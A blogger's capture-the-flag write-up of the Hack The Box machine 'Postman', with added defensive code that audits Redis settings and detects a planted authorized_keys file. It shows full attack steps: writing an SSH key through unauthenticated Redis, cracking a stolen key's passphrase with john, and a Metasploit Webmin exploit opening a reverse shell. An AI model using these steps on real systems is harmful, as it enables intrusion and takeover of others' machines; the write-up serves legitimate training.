26th January 2022
Hack The Box Write-Up Postman by T13nn3s


A hacker does for love what others would not do for money.

Laura Creighton

About Postman

In this post, I’m writing a write-up for the machine Postman from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Postman is an ‘easy’ rated box. Submitting the user.txt flag raises your points by 10, and submitting the root flag raises them by 20.

Machine Info

Machine IP and creator


Portscan (Nmap)

First, I start with a portscan with Nmap. My initial Nmap scan missed the 6379 port. So, I scanned the target again with the port range 1-10000.

~$ nmap -p 1-10000 -sC -sV -oA ./nmap/postman.txt

The results:

Nmap scan report for                                                                                                                                                                        
Host is up (0.033s latency).                                                                                                                                                                             
Scanned at 2020-02-07 20:51:34 CET for 2957s                                                                                                                                                             
Not shown: 9965 closed ports                                                                                                                                                                             
PORT      STATE    SERVICE        VERSION                                                                                                                                                                
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                                                           
| ssh-hostkey:                                                                                                                                                                                           
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)                                                                                                                                           
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open     redis          Redis key-value store 4.0.9
10000/tcp open     http           MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ndmp-version: 
|_  ERROR: Failed to get host information from server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  7 21:40:51 2020 -- 1 IP address (1 host up) scanned in 2958.40 seconds

There are four open ports:

  • 22/tcp (SSH)
  • 80/tcp (HTTP Apache Web Server)
  • 6379/tcp (Redis 4.0.9)
  • 10000/tcp (HTTP MiniServ 1.910)

Enumeration Web Server

I started by enumerating the web server and visited the website on port 80. I landed on a good-looking web page from Cyber Geek. And it seems that I’m welcome.


I looked through the website, but there are no usable pages. There is a username listed on the information bar at the bottom: [email protected]. With wfuzz I tried some wordlists and got some default folders, but nothing juicy. There is also a higher port open, so let’s check that.

Enumeration Webmin

I visited the Webmin page on port 10000 over HTTP, and there is a message visible that we have to visit this website on HTTPS. So I changed the protocol, visited the page again, and got a login page.


There is also nothing here on this webpage. I need valid credentials to log in, but I don’t have any yet. On to the next port, 6379.

Enumerate Redis

As Redis 4.0.9 is installed on this box, it is vulnerable to unauthenticated code execution. I searched the internet for an exploit and came up with this page: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html. I ran the command below:

~$ telnet 6379
Connected to
Escape character is '^]'.
echo "Hey no AUTH required!"
Hey no AUTH required!
Connection closed by foreign host.

This works; no authentication is needed. Redis is installed unprotected, without any password. Let’s exploit this vulnerability!
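From the defender's side, the exposure found above comes down to a few redis.conf directives. The following audit is an added example, not part of the original write-up; the function names and both sample configurations are constructed for illustration and are not taken from the box.

```python
import shlex

LOOPBACK = {"127.0.0.1", "::1"}

def parse_redis_conf(text):
    """Parse redis.conf text into {directive: [args]}; rename-command entries are merged."""
    conf = {"rename-command": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, *args = shlex.split(line)      # handles quoted values such as ""
        if key.lower() == "rename-command" and len(args) == 2:
            conf["rename-command"][args[0].upper()] = args[1]
        else:
            conf[key.lower()] = args
    return conf

def audit(text):
    """Return finding IDs for the settings that allow an unauthenticated remote write."""
    conf = parse_redis_conf(text)
    password = (conf.get("requirepass") or [""])[0]
    protected = (conf.get("protected-mode") or ["yes"])[0].lower() == "yes"
    bind = conf.get("bind")
    if bind is None:
        # No bind: Redis listens on all interfaces; protected mode only
        # refuses remote clients while no password is configured.
        remote = not (protected and not password)
    else:
        remote = any(addr not in LOOPBACK for addr in bind)
    findings = []
    if not password:
        findings.append("no-auth")
    if remote:
        findings.append("remote-reachable")
    if "CONFIG" not in conf["rename-command"]:
        findings.append("config-command-available")
    return findings

# Constructed samples, not taken from the box.
WEAK = """
bind 0.0.0.0 ::1
protected-mode no
port 6379
"""
HARDENED = """
bind 127.0.0.1 ::1
protected-mode yes
requirepass "placeholder-long-random-secret"
rename-command CONFIG ""
"""

if __name__ == "__main__":
    print(audit(WEAK), audit(HARDENED))
```
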


Unauthenticated code execution

I can write files to this box without any authentication. Let’s try to create a new SSH Key. I invoked this command below:

~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /home/htb/boxes/machines/postman/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/htb/boxes/machines/postman/id_rsa.
Your public key has been saved in /home/htb/boxes/machines/postman/id_rsa.pub.
The key fingerprint is:
SHA256:ZGnXXxEXku0kHb5YIhcPsW4xC3W+WuVNrYY5w28dVh0 [email protected]
The key's randomart image is:
+---[RSA 3072]----+
|             *=E=|
|         . ..oX+*|
|        = .o.*+=B|
|       + . .=+B**|
|        S   *=+*o|
|            .=+..|
|             .o .|
|             .   |
|                 |

I created this RSA key pair with no password. Now I’ve got the key. This key needs to be put into the memory of this box. I need to convert this key to the RDB format. I copied the id_rsa.pub to a text file. I added "\n\n at the start of the first line and \n\n" at the end of the last line. The contents of this file are shown below:

"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcDCqfaDbp4EzyGlF3ekfopSKbq1aFbymf5H3cr6S442cvHpJ1LgSVAUUmFJXC6K6AjtQUgNm8PTljLEUp2vcTquNJo61eN3EpWJjj0SJujVohf
= [email protected]\n\n"

Now the id_rsa.txt is just our public key but with newlines. I copied the content of this file to my clipboard and created a telnet session and invoked the commands below to load this key in the memory.

~$ telnet 6379                             
Connected to
Escape character is '^]'.
set s-key "\n\nssh-rsa <public key> [email protected]\n\n"
config set dir /var/lib/redis/.ssh                
config set dbfilename authorized_keys             
Connection closed by foreign host.

Everything looks good. Now I try to create an SSH session to this box. If everything was configured properly, I get a session without filling in any credentials.

~$ ssh -i ./id_rsa  [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Feb  7 22:04:13 2020 from
[email protected]:~$

I now have an SSH session as the user redis on this box!

[email protected]:~$ whoami
[email protected]:~$ pwd
[email protected]:~$
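A Redis dump written over authorized_keys leaves a recognisable artifact: the file starts with the RDB magic and carries binary bytes around a key that sits on its own line. The check below is an added example for detecting that artifact, not code from the original write-up; the function names and both sample byte strings are constructed.

```python
import re

# An RDB dump starts with "REDIS" followed by a four-digit format version.
RDB_MAGIC = re.compile(rb"^REDIS\d{4}")
# A plain public-key line without options: type, base64 blob, optional comment.
KEY_LINE = re.compile(
    rb"^(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-\S+) [A-Za-z0-9+/=]+(?: .*)?$")

def inspect_authorized_keys(data: bytes) -> dict:
    """Describe an authorized_keys file read as raw bytes."""
    lines = data.split(b"\n")
    return {
        "rdb_magic": bool(RDB_MAGIC.match(data)),
        # Control bytes other than tab, LF, VT, FF and CR do not belong here.
        "binary": any(b < 9 or 13 < b < 32 for b in data),
        "usable_keys": sum(1 for line in lines if KEY_LINE.match(line)),
    }

def is_suspicious(data: bytes) -> bool:
    """True when the file looks like a database dump carrying a usable key."""
    report = inspect_authorized_keys(data)
    return report["rdb_magic"] or (report["binary"] and report["usable_keys"] > 0)

# Constructed sample: RDB-style header and trailer around a key on its own line.
PLANTED = (
    b"REDIS0008\xfa\x09redis-ver\x054.0.9\xfe\x00\xfb\x01\x00\x00\x05s-key\x40\x5c"
    b"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABCONSTRUCTED unknown@example\n\n"
    b"\xff" + b"\x00" * 8
)
# Constructed sample: an ordinary authorized_keys file.
CLEAN = b"# admin key\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTED admin@example\n"

if __name__ == "__main__":
    for name, blob in (("planted", PLANTED), ("clean", CLEAN)):
        print(name, inspect_authorized_keys(blob), is_suspicious(blob))
```

An authorized_keys file in a service account's home directory, such as /var/lib/redis/.ssh on this box, is worth alerting on whatever its content.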

Enumeration on user

I have an active session with this box. Let’s poke around and check if I can find the user.txt. There is a home folder for the user Matt. It seems that the user redis does not have permission to open the user.txt file.

[email protected]:~$ cd /home/
[email protected]:/home$ ls
[email protected]:/home$ cd Matt/
[email protected]:/home/Matt$ ls
[email protected]:/home/Matt$ cat user.txt 
cat: user.txt: Permission denied
[email protected]:/home/Matt$

It took me some hours of searching and poking around. It was driving me insane when it turned out I couldn’t find anything useful. After a little walk outside, I decided to put the knowledge from my previous boxes to the test and tried to use the grep command to search for useful files. As grep is not working on this machine, I tried the ‘find’ command. After some searching, I couldn’t believe my eyes! I had just found a backup of a private key!

[email protected]:/$ find . -name "id_rsa*" -print -quit

This has to be the private key of the user Matt!

[email protected]:/opt$ cat id_rsa.bak 
Proc-Type: 4,ENCRYPTED

I copied the content to the file ‘id_rsa.bak’ on my Kali machine and gave it to ssh2john:

~# python ssh2john.py id_rsa.bak 

I placed this hash into ‘ssh_password.txt’ and let john crack the passphrase:

~# john ssh_password.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)

That’s an easy password. Let’s try to create a connection with ssh. It turns out that Matt doesn’t have permission to log in through SSH. After all those hours of work, this was a disappointment and it hit hard. I had to get myself back under control, with a cup of coffee, before I could go on.

Get user.txt

I logged back in as redis. Maybe I can switch to Matt with the su Matt command. And it is possible to switch accounts and get the user flag!

sudo: unable to initialize policy plugin
[email protected]:~$ su Matt
[email protected]:/var/lib/redis$ cat /home/Matt/user.txt 
[email protected]:/var/lib/redis$

It’s still very exciting to grab the user flag.


Exploit Webmin (Metasploit)

Now on to root! I feel like there’s been a horse in the living room for hours, and we haven’t done anything about it... The name of the horse: Webmin. I went back to the Webmin portal and logged in as Matt.


Matt has access to the Software Package Updates, and I found an article on the internet (https://www.exploit-db.com/exploits/46984). There is a Metasploit module available to exploit this vulnerability. I started msfconsole, exploited Webmin and grabbed the root.txt flag.

msf5 > use exploit/linux/http/web                                                                                                                                                                        
use exploit/linux/http/webcalendar_settings_exec  use exploit/linux/http/webid_converter            use exploit/linux/http/webmin_backdoor            use exploit/linux/http/webmin_packageup_rce        
msf5 > use exploit/linux/http/webmin_packageup_rce                                                                                                                                                       
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts                                                                                                                                  
rhosts =>                                                                                                                                                                                   
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt                                                                                                                                        
username => Matt                                                                                                                                                                                         
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008                                                                                                                                
password => computer2008                                                                                                                                                                                 
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true                                                                                                                                             
ssl => true                                                                                                                                                                                              
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost                                                                                                                                    
lhost =>                                                                                                                                                                                     
msf5 exploit(linux/http/webmin_packageup_rce) > exploit                                                                                                                                                  
[*] Started reverse TCP handler on                                                                                                                                                      
[+] Session cookie: af1882183da1a304a49faf5183463233                                                                                                                                                     
[*] Attempting to execute the payload...                                                                                                                                                                 
[*] Command shell session 1 opened ( -> at 2020-02-08 00:23:06 +0100
shell
[*] Trying to find binary(python) on target machine                                                                                                                                                      
[*] Found python at                                                                                                                                                                                      
[*] Using `python` to pop up an interactive shel
cat /root/root.txt

Rooted this box. I have to say that this is the easiest privilege escalation I have ever done on Hack The Box. Did you like this write-up? Please consider spending some respect points. My profile: https://www.hackthebox.eu/profile/224856. Many thanks in advance!

As always: Happy Hacking!


I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.
